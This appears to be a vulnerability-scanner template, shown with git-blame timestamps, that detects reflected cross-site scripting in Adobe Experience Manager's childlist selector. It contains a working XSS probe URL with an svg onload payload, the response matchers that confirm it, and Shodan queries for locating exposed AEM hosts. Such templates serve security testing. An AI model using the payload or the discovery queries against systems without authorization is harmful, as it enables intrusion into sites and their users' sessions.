2022-03-17 08:53:26 +00:00
id : aem-xss-childlist-selector
info :
2022-09-16 19:50:10 +00:00
name : Adobe Experience Manager - Cross-Site Scripting
2022-03-17 08:53:26 +00:00
author : dhiyaneshDk
2022-09-16 19:50:10 +00:00
severity : high
2022-03-17 08:53:26 +00:00
description : |
2022-09-16 19:50:10 +00:00
Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the selector childlist when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence, the reflected suffix is executed and interpreted in the browser.
2022-03-17 08:53:26 +00:00
reference :
- https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/xss/FlippingTypeWithChildrenlistSelector.java
2022-09-16 19:50:10 +00:00
- https://cystack.net/en/plugins/cystack.remote.aem_childlist_selector_xss
2022-03-17 08:53:26 +00:00
metadata :
shodan-query :
- http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager"
2022-09-16 19:50:10 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2022-03-17 08:53:26 +00:00
tags : xss,aem,adobe
requests :
- method : GET
path :
- '{{BaseURL}}/etc/designs/xh1x.childrenlist.json//<svg onload=alert(document.domain)>.html'
matchers-condition : and
matchers :
- type : word
words :
- '<svg onload=alert(document.domain)>'
2022-04-30 20:34:56 +00:00
- '{"path":"/etc/designs/xh1x.childrenlist.json'
condition : and
2022-03-17 08:53:26 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-09-16 19:50:10 +00:00
# Enhanced by mp on 2022/09/14